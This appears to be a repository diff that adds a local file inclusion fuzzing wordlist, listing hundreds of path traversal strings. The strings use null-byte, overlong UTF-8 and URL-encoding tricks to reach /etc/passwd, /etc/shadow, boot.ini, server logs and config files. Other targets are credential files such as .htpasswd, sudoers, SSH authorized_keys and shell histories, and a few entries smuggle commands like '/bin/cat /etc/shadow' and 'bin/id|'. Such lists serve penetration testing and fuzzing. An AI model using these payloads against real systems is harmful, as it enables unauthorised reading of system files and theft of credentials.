nochex_apc_test.php
|
||||||
|
dragdrop2_test.html
|
||||||
|
dragdrop4_test.html
|
||||||
|
dragdrop3_test.html
|
||||||
|
dragdrop6_test.html
|
||||||
|
dragdrop7_test.html
|
||||||
|
dragdrop5_test.html
|
||||||
|
dragdrop8_test.html
|
||||||
|
sortable6_test.html
|
||||||
|
run_unit_tests.html
|
||||||
|
sortable5_test.html
|
||||||
|
sortable2_test.html
|
||||||
|
sortable4_test.html
|
||||||
|
sortable3_test.html
|
||||||
|
dbo_mysqli.test.php
|
||||||
|
dragdrop9_test.html
|
||||||
|
interfaces_test.php
|
||||||
|
test1-parsehtml.txt
|
||||||
|
test_adodb_lite.php
|
||||||
|
function.testme.php
|
||||||
|
acceptance_test.php
|
||||||
|
simple_web_test.php
|
||||||
|
tests_plugins_tests
|
||||||
|
treetest-schema.xml
|
||||||
|
web_tester_test.php
|
||||||
|
user_agent_test.php
|
||||||
|
simpletest_test.php
|
||||||
|
annotation_test.php
|
||||||
|
test_container.html
|
||||||
742
Fuzzing/JHADDIX_LFI.txt
Normal file
742
Fuzzing/JHADDIX_LFI.txt
Normal file
@@ -0,0 +1,742 @@
|
|||||||
|
/.../.../.../.../.../
|
||||||
|
\<5C>..\\\<5C>..\\\<5C>..\\\
|
||||||
|
%00../../../../../../etc/passwd
|
||||||
|
%00/etc/passwd%00
|
||||||
|
%00../../../../../../etc/shadow
|
||||||
|
%00/etc/shadow%00
|
||||||
|
%0a/bin/cat%20/etc/passwd
|
||||||
|
%0a/bin/cat%20/etc/shadow
|
||||||
|
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||||
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
||||||
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||||
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
||||||
|
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
|
||||||
|
/../../../../../../../../%2A
|
||||||
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
|
||||||
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||||
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
||||||
|
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
|
||||||
|
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
|
||||||
|
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
|
||||||
|
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
|
||||||
|
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
|
||||||
|
=3D <20>/..<2E> . <20>%2f..
|
||||||
|
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
|
||||||
|
admin/access_log
|
||||||
|
/admin/install.php
|
||||||
|
../../../administrator/inbox
|
||||||
|
/apache2/logs/access_log
|
||||||
|
/apache2/logs/access.log
|
||||||
|
/apache2/logs/error_log
|
||||||
|
/apache2/logs/error.log
|
||||||
|
/apache/logs/access_log
|
||||||
|
/apache/logs/access.log
|
||||||
|
../../../../../apache/logs/access.log
|
||||||
|
../../../../apache/logs/access.log
|
||||||
|
../../../apache/logs/access.log
|
||||||
|
../../apache/logs/access.log
|
||||||
|
../apache/logs/access.log
|
||||||
|
/apache/logs/error_log
|
||||||
|
/apache/logs/error.log
|
||||||
|
../../../../../apache/logs/error.log
|
||||||
|
../../../../apache/logs/error.log
|
||||||
|
../../../apache/logs/error.log
|
||||||
|
../../apache/logs/error.log
|
||||||
|
../apache/logs/error.log
|
||||||
|
/apache\php\php.ini
|
||||||
|
\\'/bin/cat%20/etc/passwd\\'
|
||||||
|
\\'/bin/cat%20/etc/shadow\\'
|
||||||
|
/.bash_history
|
||||||
|
/.bash_profile
|
||||||
|
/.bashrc
|
||||||
|
/../../../../../../../../bin/id|
|
||||||
|
/bin/php.ini
|
||||||
|
/boot/grub/grub.conf
|
||||||
|
/./././././././././././boot.ini
|
||||||
|
/../../../../../../../../../../../boot.ini
|
||||||
|
/..\../..\../..\../..\../..\../..\../boot.ini
|
||||||
|
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
||||||
|
..//..//..//..//..//boot.ini
|
||||||
|
../../../../../../../../../../../../boot.ini
|
||||||
|
../../boot.ini
|
||||||
|
..\../..\../..\../..\../boot.ini
|
||||||
|
..\../..\../boot.ini
|
||||||
|
..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||||
|
\..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||||
|
/../../../../../../../../../../../boot.ini%00
|
||||||
|
../../../../../../../../../../../../boot.ini%00
|
||||||
|
..\..\..\..\..\..\..\..\..\..\boot.ini%00
|
||||||
|
/../../../../../../../../../../../boot.ini%00.html
|
||||||
|
/../../../../../../../../../../../boot.ini%00.jpg
|
||||||
|
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
|
||||||
|
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
||||||
|
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
||||||
|
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
||||||
|
c:\apache\logs\access.log
|
||||||
|
c:\apache\logs\error.log
|
||||||
|
c:\AppServ\MySQL
|
||||||
|
C:/boot.ini
|
||||||
|
C:\boot.ini
|
||||||
|
/C:/inetpub/ftproot/
|
||||||
|
C:/inetpub/wwwroot/global.asa
|
||||||
|
C:\inetpub\wwwroot\global.asa
|
||||||
|
c:\inetpub\wwwroot\index.asp
|
||||||
|
/config.asp
|
||||||
|
../config.asp
|
||||||
|
config.asp
|
||||||
|
../config.inc.php
|
||||||
|
config.inc.php
|
||||||
|
../config.js
|
||||||
|
config.js
|
||||||
|
_config.php
|
||||||
|
../_config.php
|
||||||
|
../config.php
|
||||||
|
config.php
|
||||||
|
../_config.php%00
|
||||||
|
../../../../../../../../conf/server.xml
|
||||||
|
/core/config.php
|
||||||
|
/C:\Program Files\
|
||||||
|
c:\Program Files\Apache Group\Apache\logs\access.log
|
||||||
|
c:\Program Files\Apache Group\Apache\logs\error.log
|
||||||
|
/.cshrc
|
||||||
|
c:\System32\Inetsrv\metabase.xml
|
||||||
|
c:WINDOWS/system32/
|
||||||
|
d:\AppServ\MySQL
|
||||||
|
database.asp
|
||||||
|
database.js
|
||||||
|
database.php
|
||||||
|
data.php
|
||||||
|
dbase.php a
|
||||||
|
db.php
|
||||||
|
../../../../../../../dev
|
||||||
|
/D:\Program Files\
|
||||||
|
d:\System32\Inetsrv\metabase.xml
|
||||||
|
/etc/apache2/apache2.conf
|
||||||
|
/etc/apache2/conf/httpd.conf
|
||||||
|
/etc/apache2/httpd.conf
|
||||||
|
/etc/apache2/sites-available/default
|
||||||
|
/etc/apache2/vhosts.d/default_vhost.include
|
||||||
|
/etc/apache/apache.conf
|
||||||
|
/etc/apache/conf/httpd.conf
|
||||||
|
/etc/apache/httpd.conf
|
||||||
|
/etc/apt/sources.list
|
||||||
|
/etc/chrootUsers
|
||||||
|
/etc/crontab
|
||||||
|
/etc/defaultdomain
|
||||||
|
/etc/default/passwd
|
||||||
|
/etc/defaultrouter
|
||||||
|
/etc/fstab
|
||||||
|
/etc/ftpchroot
|
||||||
|
/etc/ftphosts
|
||||||
|
/etc/group
|
||||||
|
/etc/hostname.bge
|
||||||
|
/etc/hostname.ce0
|
||||||
|
/etc/hostname.ce1
|
||||||
|
/etc/hostname.ce2
|
||||||
|
/etc/hostname.ce3
|
||||||
|
/etc/hostname.dcelx0
|
||||||
|
/etc/hostname.dcelx1
|
||||||
|
/etc/hostname.dcelx2
|
||||||
|
/etc/hostname.dcelx3
|
||||||
|
/etc/hostname.dmfe0
|
||||||
|
/etc/hostname.dmfe1
|
||||||
|
/etc/hostname.dmfe2
|
||||||
|
/etc/hostname.dmfe3
|
||||||
|
/etc/hostname.dnet0
|
||||||
|
/etc/hostname.dnet1
|
||||||
|
/etc/hostname.dnet2
|
||||||
|
/etc/hostname.dnet3
|
||||||
|
/etc/hostname.ecn0
|
||||||
|
/etc/hostname.ecn1
|
||||||
|
/etc/hostname.ecn2
|
||||||
|
/etc/hostname.ecn3
|
||||||
|
/etc/hostname.elx0
|
||||||
|
/etc/hostname.elx1
|
||||||
|
/etc/hostname.elx2
|
||||||
|
/etc/hostname.elx3
|
||||||
|
/etc/hostname.elxl0
|
||||||
|
/etc/hostname.elxl1
|
||||||
|
/etc/hostname.elxl2
|
||||||
|
/etc/hostname.elxl3
|
||||||
|
/etc/hostname.eri0
|
||||||
|
/etc/hostname.eri1
|
||||||
|
/etc/hostname.eri2
|
||||||
|
/etc/hostname.eri3
|
||||||
|
/etc/hostname.ge0
|
||||||
|
/etc/hostname.ge1
|
||||||
|
/etc/hostname.ge2
|
||||||
|
/etc/hostname.ge3
|
||||||
|
/etc/hostname.hme0
|
||||||
|
/etc/hostname.hme1
|
||||||
|
/etc/hostname.hme2
|
||||||
|
/etc/hostname.hme3
|
||||||
|
/etc/hostname.ieef0
|
||||||
|
/etc/hostname.ieef1
|
||||||
|
/etc/hostname.ieef2
|
||||||
|
/etc/hostname.ieef3
|
||||||
|
/etc/hostname.iprb0
|
||||||
|
/etc/hostname.iprb1
|
||||||
|
/etc/hostname.iprb2
|
||||||
|
/etc/hostname.iprb3
|
||||||
|
/etc/hostname.le0
|
||||||
|
/etc/hostname.le1
|
||||||
|
/etc/hostname.le2
|
||||||
|
/etc/hostname.le3
|
||||||
|
/etc/hostname.lo
|
||||||
|
/etc/hostname.pcn0
|
||||||
|
/etc/hostname.pcn1
|
||||||
|
/etc/hostname.pcn2
|
||||||
|
/etc/hostname.pcn3
|
||||||
|
/etc/hostname.qfe0
|
||||||
|
/etc/hostname.qfe1
|
||||||
|
/etc/hostname.qfe2
|
||||||
|
/etc/hostname.qfe3
|
||||||
|
/etc/hostname.spwr0
|
||||||
|
/etc/hostname.spwr1
|
||||||
|
/etc/hostname.spwr2
|
||||||
|
/etc/hostname.spwr3
|
||||||
|
/etc/hosts
|
||||||
|
../../../../../../../../../../../../etc/hosts
|
||||||
|
../../../../../../../../../../../../etc/hosts%00
|
||||||
|
/etc/hosts.allow
|
||||||
|
/etc/hosts.deny
|
||||||
|
/etc/hosts.equiv
|
||||||
|
/etc/http/conf/httpd.conf
|
||||||
|
/etc/httpd.conf
|
||||||
|
/etc/httpd/conf.d/php.conf
|
||||||
|
/etc/httpd/conf.d/squirrelmail.conf
|
||||||
|
/etc/httpd/conf.d/ssl.conf
|
||||||
|
/etc/httpd/conf/httpd.conf
|
||||||
|
/etc/httpd/httpd.conf
|
||||||
|
/etc/httpd/logs/acces_log
|
||||||
|
/etc/httpd/logs/acces.log
|
||||||
|
../../../../../../../etc/httpd/logs/acces_log
|
||||||
|
../../../../../../../etc/httpd/logs/acces.log
|
||||||
|
/etc/httpd/logs/access_log
|
||||||
|
/etc/httpd/logs/access.log
|
||||||
|
../../../../../etc/httpd/logs/access_log
|
||||||
|
../../../../../etc/httpd/logs/access.log
|
||||||
|
/etc/httpd/logs/error_log
|
||||||
|
/etc/httpd/logs/error.log
|
||||||
|
../../../../../../../etc/httpd/logs/error_log
|
||||||
|
../../../../../../../etc/httpd/logs/error.log
|
||||||
|
../../../../../etc/httpd/logs/error_log
|
||||||
|
../../../../../etc/httpd/logs/error.log
|
||||||
|
/etc/httpd/php.ini
|
||||||
|
/etc/http/httpd.conf
|
||||||
|
/etc/inetd.conf
|
||||||
|
/etc/init.d/apache
|
||||||
|
/etc/init.d/apache2
|
||||||
|
/etc/issue
|
||||||
|
/etc/logrotate.d/ftp
|
||||||
|
/etc/logrotate.d/httpd
|
||||||
|
/etc/logrotate.d/proftpd
|
||||||
|
/etc/logrotate.d/vsftpd.log
|
||||||
|
/etc/mail/access
|
||||||
|
/etc/mailman/mm_cfg.py
|
||||||
|
/etc/make.conf
|
||||||
|
/etc/master.passwd
|
||||||
|
/etc/motd
|
||||||
|
/etc/my.cnf
|
||||||
|
/etc/mysql/my.cnf
|
||||||
|
/etc/netconfig
|
||||||
|
/etc/nsswitch.conf
|
||||||
|
/etc/opt/ipf/ipf.conf
|
||||||
|
/etc/opt/ipf/ipnat.conf
|
||||||
|
/./././././././././././etc/passwd
|
||||||
|
/../../../../../../../../../../etc/passwd
|
||||||
|
/../../../../../../../../../../etc/passwd^^
|
||||||
|
/..\../..\../..\../..\../..\../..\../etc/passwd
|
||||||
|
/etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../etc/passwd
|
||||||
|
../../../../../../etc/passwd
|
||||||
|
../../../../../etc/passwd
|
||||||
|
../../../../etc/passwd
|
||||||
|
../../../etc/passwd
|
||||||
|
../../etc/passwd
|
||||||
|
../etc/passwd
|
||||||
|
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||||
|
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
||||||
|
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||||
|
etc/passwd
|
||||||
|
/etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../etc/passwd%00
|
||||||
|
../../../../../etc/passwd%00
|
||||||
|
../../../../etc/passwd%00
|
||||||
|
../../../etc/passwd%00
|
||||||
|
../../etc/passwd%00
|
||||||
|
../etc/passwd%00
|
||||||
|
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||||
|
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||||
|
/../../../../../../../../../../../etc/passwd%00.html
|
||||||
|
/../../../../../../../../../../../etc/passwd%00.jpg
|
||||||
|
../../../../../../etc/passwd&=%3C%3C%3C%3C
|
||||||
|
/etc/php4.4/fcgi/php.ini
|
||||||
|
/etc/php4/apache2/php.ini
|
||||||
|
/etc/php4/apache/php.ini
|
||||||
|
/etc/php4/cgi/php.ini
|
||||||
|
/etc/php5/apache2/php.ini
|
||||||
|
/etc/php5/apache/php.ini
|
||||||
|
/etc/php5/cgi/php.ini
|
||||||
|
/etc/php/apache2/php.ini
|
||||||
|
/etc/php/apache/php.ini
|
||||||
|
/etc/php/cgi/php.ini
|
||||||
|
/etc/php.d/dom.ini
|
||||||
|
/etc/php.d/gd.ini
|
||||||
|
/etc/php.d/imap.ini
|
||||||
|
/etc/php.d/json.ini
|
||||||
|
/etc/php.d/ldap.ini
|
||||||
|
/etc/php.d/mbstring.ini
|
||||||
|
/etc/php.d/mysqli.ini
|
||||||
|
/etc/php.d/mysql.ini
|
||||||
|
/etc/php.d/odbc.ini
|
||||||
|
/etc/php.d/pdo.ini
|
||||||
|
/etc/php.d/pdo_mysql.ini
|
||||||
|
/etc/php.d/pdo_odbc.ini
|
||||||
|
/etc/php.d/pdo_pgsql.ini
|
||||||
|
/etc/php.d/pdo_sqlite.ini
|
||||||
|
/etc/php.d/pgsql.ini
|
||||||
|
/etc/php.d/xmlreader.ini
|
||||||
|
/etc/php.d/xmlwriter.ini
|
||||||
|
/etc/php.d/xsl.ini
|
||||||
|
/etc/php.d/zip.ini
|
||||||
|
/etc/php.ini
|
||||||
|
/etc/php/php4/php.ini
|
||||||
|
/etc/php/php.ini
|
||||||
|
/etc/postfix/mydomains
|
||||||
|
/etc/proftp.conf
|
||||||
|
/etc/proftpd/modules.conf
|
||||||
|
/etc/protpd/proftpd.conf
|
||||||
|
/etc/pure-ftpd.conf
|
||||||
|
/etc/pureftpd.passwd
|
||||||
|
/etc/pureftpd.pdb
|
||||||
|
/etc/pure-ftpd/pure-ftpd.conf
|
||||||
|
/etc/pure-ftpd/pure-ftpd.pdb
|
||||||
|
/etc/pure-ftpd/pureftpd.pdb
|
||||||
|
/etc/release
|
||||||
|
/etc/resolv.conf
|
||||||
|
/etc/rpc
|
||||||
|
/etc/security/environ
|
||||||
|
/etc/security/failedlogin
|
||||||
|
/etc/security/group
|
||||||
|
/etc/security/lastlog
|
||||||
|
/etc/security/limits
|
||||||
|
/etc/security/passwd
|
||||||
|
/etc/security/user
|
||||||
|
/./././././././././././etc/shadow
|
||||||
|
/../../../../../../../../../../etc/shadow
|
||||||
|
/../../../../../../../../../../etc/shadow^^
|
||||||
|
/..\../..\../..\../..\../..\../..\../etc/shadow
|
||||||
|
/etc/shadow
|
||||||
|
../../../../../../../../../../../../etc/shadow
|
||||||
|
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||||
|
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
||||||
|
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||||
|
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
|
||||||
|
../../../../../../../../../../../../etc/shadow%00
|
||||||
|
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||||
|
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||||
|
etc/shadow%00
|
||||||
|
/etc/ssh/sshd_config
|
||||||
|
/etc/sudoers
|
||||||
|
/etc/syslog.conf
|
||||||
|
/etc/syslogd.conf
|
||||||
|
/etc/system
|
||||||
|
/etc/updatedb.conf
|
||||||
|
/etc/utmp
|
||||||
|
/etc/vfstab
|
||||||
|
/etc/vhcs2/proftpd/proftpd.conf
|
||||||
|
/etc/vsftpd.chroot_list
|
||||||
|
/etc/vsftpd.conf
|
||||||
|
/etc/vsftpd/vsftpd.conf
|
||||||
|
/etc/wtmp
|
||||||
|
/etc/wu-ftpd/ftpaccess
|
||||||
|
/etc/wu-ftpd/ftphosts
|
||||||
|
/etc/wu-ftpd/ftpusers
|
||||||
|
/.forward
|
||||||
|
/home2\bin\stable\apache\php.ini
|
||||||
|
/home/apache/conf/httpd.conf
|
||||||
|
/home/apache/httpd.conf
|
||||||
|
/home\bin\stable\apache\php.ini
|
||||||
|
/.htpasswd
|
||||||
|
.htpasswd
|
||||||
|
../.htpasswd
|
||||||
|
../install.php
|
||||||
|
install.php
|
||||||
|
../../../../../../../../../../../../localstart.asp
|
||||||
|
../../../../../../../../../../../../localstart.asp%00
|
||||||
|
/log/miscDir/accesslog
|
||||||
|
/.logout
|
||||||
|
/logs/access_log
|
||||||
|
/logs/access.log
|
||||||
|
../../../../../logs/access.log
|
||||||
|
../../../../logs/access.log
|
||||||
|
../../../logs/access.log
|
||||||
|
../../logs/access.log
|
||||||
|
../logs/access.log
|
||||||
|
/logs/error_log
|
||||||
|
/logs/error.log
|
||||||
|
../../../../../logs/error.log
|
||||||
|
../../../../logs/error.log
|
||||||
|
../../../logs/error.log
|
||||||
|
../../logs/error.log
|
||||||
|
../logs/error.log
|
||||||
|
/logs/pure-ftpd.log
|
||||||
|
/master.passwd
|
||||||
|
member/.htpasswd
|
||||||
|
members/.htpasswd
|
||||||
|
/.netrc
|
||||||
|
/NetServer\bin\stable\apache\php.ini
|
||||||
|
/opt/apache2/conf/httpd.conf
|
||||||
|
/opt/apache/conf/httpd.conf
|
||||||
|
/opt/lampp/logs/access_log
|
||||||
|
/opt/lampp/logs/access.log
|
||||||
|
/opt/lampp/logs/error_log
|
||||||
|
/opt/lampp/logs/error.log
|
||||||
|
/opt/xampp/etc/php.ini
|
||||||
|
/opt/xampp/logs/access_log
|
||||||
|
/opt/xampp/logs/access.log
|
||||||
|
/opt/xampp/logs/error_log
|
||||||
|
/opt/xampp/logs/error.log
|
||||||
|
.pass
|
||||||
|
../.pass
|
||||||
|
pass.dat
|
||||||
|
passwd
|
||||||
|
/.passwd
|
||||||
|
.passwd
|
||||||
|
../.passwd
|
||||||
|
passwd.dat
|
||||||
|
/php4\php.ini
|
||||||
|
/php5\php.ini
|
||||||
|
/php\php.ini
|
||||||
|
/PHP\php.ini
|
||||||
|
/private/etc/httpd/httpd.conf
|
||||||
|
/private/etc/httpd/httpd.conf.default
|
||||||
|
/proc/cpuinfo
|
||||||
|
/proc/interrupts
|
||||||
|
/proc/loadavg
|
||||||
|
/proc/meminfo
|
||||||
|
/proc/mounts
|
||||||
|
/proc/net/arp
|
||||||
|
/proc/net/dev
|
||||||
|
/proc/net/route
|
||||||
|
/proc/net/tcp
|
||||||
|
/proc/partitions
|
||||||
|
/proc/self/cmdline
|
||||||
|
/proc/self/envron
|
||||||
|
/proc/version
|
||||||
|
/.profile
|
||||||
|
/Program Files\Apache Group\Apache2\conf\httpd.conf
|
||||||
|
/Program Files\Apache Group\Apache\conf\httpd.conf
|
||||||
|
/Program Files\Apache Group\Apache\logs\access.log
|
||||||
|
/Program Files\Apache Group\Apache\logs\error.log
|
||||||
|
/Program Files\xampp\apache\conf\httpd.conf
|
||||||
|
/../../../../pswd
|
||||||
|
/.rhosts
|
||||||
|
/root/.bash_history
|
||||||
|
/root/.bash_logut
|
||||||
|
root/.htpasswd
|
||||||
|
/root/.ksh_history
|
||||||
|
/root/.Xauthority
|
||||||
|
/.sh_history
|
||||||
|
/.shosts
|
||||||
|
/.ssh/authorized_keys
|
||||||
|
user/.htpasswd
|
||||||
|
../users.db.php
|
||||||
|
users.db.php
|
||||||
|
users/.htpasswd
|
||||||
|
/usr/apache2/conf/httpd.conf
|
||||||
|
/usr/apache/conf/httpd.conf
|
||||||
|
/usr/etc/pure-ftpd.conf
|
||||||
|
/usr/lib/cron/log
|
||||||
|
/usr/lib/php.ini
|
||||||
|
/usr/lib/php/php.ini
|
||||||
|
/usr/lib/security/mkuser.default
|
||||||
|
/usr/local/apache2/conf/httpd.conf
|
||||||
|
/usr/local/apache2/httpd.conf
|
||||||
|
/usr/local/apache2/logs/access_log
|
||||||
|
/usr/local/apache2/logs/access.log
|
||||||
|
/usr/local/apache2/logs/error_log
|
||||||
|
/usr/local/apache2/logs/error.log
|
||||||
|
/usr/local/apache/conf/httpd.conf
|
||||||
|
/usr/local/apache/conf/php.ini
|
||||||
|
/usr/local/apache/httpd.conf
|
||||||
|
/usr/local/apache/log
|
||||||
|
/usr/local/apache/logs
|
||||||
|
/usr/local/apache/logs/access_log
|
||||||
|
/usr/local/apache/logs/access_ log
|
||||||
|
/usr/local/apache/logs/access.log
|
||||||
|
/usr/local/apache/logs/access. log
|
||||||
|
../../../../../../../usr/local/apache/logs/access_ log
|
||||||
|
../../../../../../../usr/local/apache/logs/access. log
|
||||||
|
../../../../../usr/local/apache/logs/access_log
|
||||||
|
../../../../../usr/local/apache/logs/access.log
|
||||||
|
/usr/local/apache/logs/error_log
|
||||||
|
/usr/local/apache/logs/error.log
|
||||||
|
../../../../../../../usr/local/apache/logs/error_l og
|
||||||
|
../../../../../../../usr/local/apache/logs/error.l og
|
||||||
|
../../../../../usr/local/apache/logs/error_log
|
||||||
|
../../../../../usr/local/apache/logs/error.log
|
||||||
|
/usr/local/apps/apache2/conf/httpd.conf
|
||||||
|
/usr/local/apps/apache/conf/httpd.conf
|
||||||
|
/usr/local/cpanel/logs
|
||||||
|
/usr/local/cpanel/logs/access_log
|
||||||
|
/usr/local/cpanel/logs/error_log
|
||||||
|
/usr/local/cpanel/logs/license_log
|
||||||
|
/usr/local/cpanel/logs/login_log
|
||||||
|
/usr/local/cpanel/logs/stats_log
|
||||||
|
/usr/local/etc/apache2/conf/httpd.conf
|
||||||
|
/usr/local/etc/apache/conf/httpd.conf
|
||||||
|
/usr/local/etc/apache/vhosts.conf
|
||||||
|
/usr/local/etc/httpd/conf/httpd.conf
|
||||||
|
/usr/local/etc/httpd/logs/access_log
|
||||||
|
/usr/local/etc/httpd/logs/error_log
|
||||||
|
/usr/local/etc/php.ini
|
||||||
|
/usr/local/etc/pure-ftpd.conf
|
||||||
|
/usr/local/etc/pureftpd.pdb
|
||||||
|
/usr/local/httpd/conf/httpd.conf
|
||||||
|
/usr/local/lib/php.ini
|
||||||
|
/usr/local/php4/httpd.conf
|
||||||
|
/usr/local/php4/httpd.conf.php
|
||||||
|
/usr/local/php4/lib/php.ini
|
||||||
|
/usr/local/php5/httpd.conf
|
||||||
|
/usr/local/php5/httpd.conf.php
|
||||||
|
/usr/local/php5/lib/php.ini
|
||||||
|
/usr/local/php/httpd.conf
|
||||||
|
/usr/local/php/httpd.conf.php
|
||||||
|
/usr/local/php/lib/php.ini
|
||||||
|
/usr/local/pureftpd/etc/pure-ftpd.conf
|
||||||
|
/usr/local/pureftpd/etc/pureftpd.pdb
|
||||||
|
/usr/local/pureftpd/sbin/pure-config.pl
|
||||||
|
/usr/local/www/logs/thttpd_log
|
||||||
|
/usr/local/Zend/etc/php.ini
|
||||||
|
/usr/pkgsrc/net/pureftpd/
|
||||||
|
/usr/ports/contrib/pure-ftpd/
|
||||||
|
/usr/ports/ftp/pure-ftpd/
|
||||||
|
/usr/ports/net/pure-ftpd/
|
||||||
|
/usr/sbin/pure-config.pl
|
||||||
|
/usr/spool/lp/log
|
||||||
|
/usr/spool/mqueue/syslog
|
||||||
|
/var/adm
|
||||||
|
/var/adm/acct/sum/loginlog
|
||||||
|
/var/adm/aculog
|
||||||
|
/var/adm/aculogs
|
||||||
|
/var/adm/crash/unix
|
||||||
|
/var/adm/crash/vmcore
|
||||||
|
/var/adm/cron/log
|
||||||
|
/var/adm/dtmp
|
||||||
|
/var/adm/lastlog
|
||||||
|
/var/adm/lastlog/username
|
||||||
|
/var/adm/log/asppp.log
|
||||||
|
/var/adm/loginlog
|
||||||
|
/var/adm/log/xferlog
|
||||||
|
/var/adm/lp/lpd-errs
|
||||||
|
/var/adm/messages
|
||||||
|
/var/adm/pacct
|
||||||
|
/var/adm/qacct
|
||||||
|
/var/adm/ras/bootlog
|
||||||
|
/var/adm/ras/errlog
|
||||||
|
/var/adm/sulog
|
||||||
|
/var/adm/SYSLOG
|
||||||
|
/var/adm/utmp
|
||||||
|
/var/adm/utmpx
|
||||||
|
/var/adm/vold.log
|
||||||
|
/var/adm/wtmp
|
||||||
|
/var/adm/wtmpx
|
||||||
|
/var/adm/X0msgs
|
||||||
|
/var/apache/log
|
||||||
|
/var/apache/logs
|
||||||
|
/var/apache/logs/access_log
|
||||||
|
/var/apache/logs/error_log
|
||||||
|
/var/cpanel/cpanel.config
|
||||||
|
/var/cron/log
|
||||||
|
/var/lib/mlocate/mlocate.db
|
||||||
|
/var/lib/mysql/my.cnf
|
||||||
|
/var/local/www/conf/php.ini
|
||||||
|
/var/lock/samba
|
||||||
|
/var/log
|
||||||
|
/var/log/access_log
|
||||||
|
/var/log/access.log
|
||||||
|
../../../../../../../var/log/access_log
|
||||||
|
../../../../../../../var/log/access.log
|
||||||
|
../../../../../var/log/access_log
|
||||||
|
/var/log/acct
|
||||||
|
/var/log/apache2/access_log
|
||||||
|
/var/log/apache2/access.log
|
||||||
|
../../../../../../../var/log/apache2/access_log
|
||||||
|
../../../../../../../var/log/apache2/access.log
|
||||||
|
/var/log/apache2/error_log
|
||||||
|
/var/log/apache2/error.log
|
||||||
|
../../../../../../../var/log/apache2/error_log
|
||||||
|
../../../../../../../var/log/apache2/error.log
|
